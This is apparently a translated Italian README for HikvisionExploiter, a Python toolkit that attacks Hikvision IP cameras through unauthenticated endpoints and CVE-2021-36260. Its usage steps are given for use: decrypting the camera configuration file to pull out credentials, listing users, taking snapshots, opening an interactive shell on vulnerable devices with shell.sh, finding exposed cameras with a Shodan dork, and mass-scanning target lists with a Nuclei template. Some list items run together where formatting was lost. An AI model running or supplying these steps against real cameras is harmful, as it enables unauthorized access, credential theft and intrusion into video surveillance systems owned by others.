
HikvisionExploiter è un'utility basata su Python progettata per automatizzare lo sfruttamento e i controlli di accessibilità delle directory su telecamere di rete Hikvision, sfruttando l'interfaccia Web versione 3.1.3.150324 e il rilevamento di CVE-2021-36260.
HikvisionExploiter è un toolkit di exploitazione potente e automatizzato che prende di mira endpoint non autenticati sulle telecamere IP Hikvision, in particolare quelle con versione firmware 3.1.3.150324.
Esegue:
Progettato per ricercatori, red teamer e appassionati di sicurezza IoT.
/onvif-http/snapshot/System/configurationFile cifrato, lo decifra usando AES + XOR ed estrae le credenziali/Security/userswebLanguagelogs/ThreadPoolExecutorpip install -r requirements.txtffmpeg (opzionale, per una futura funzionalità da snapshot a video)pycrypto (per la decifratura della config):
pip install pycrypto
git clone https://github.com/HexBuddy/HikvisionExploiter.git
cd HikvisionExploiter
pip3 install -r requirements.txt
Crea un file targets.txt con il seguente formato:
IP:PORT
Esempio:
192.168.1.10:80
10.10.10.20:81
python3 checker.py
Questo script:
logs/IP_PORT_TIMESTAMP/Per eseguire comandi in modalità interattiva su un dispositivo vulnerabile:
chmod +x shell.sh
./shell.sh <ip:port>
Esempio:
./shell.sh 192.168.1.10:80
Se vulnerabile, accederai a una shell interattiva:
hikvision-shell> uname -a
Linux hik-cam 3.0.8 #1 Wed Mar 18 ...
Usa il seguente dork di Shodan per individuare telecamere Hikvision esposte:
3.1.3.150324
È incluso un modello compatibile con Nuclei: nuclei-template.yaml
Utilizzo:
nuclei -t nuclei-template.yaml -list targets.txt
Rileva:
Licenza MIT ©
Vedi LICENSE per maggiori dettagli.
Telegram: @HexBuddy127001
Realizzato con ❤️ esclusivamente per ricerca educativa ed etica.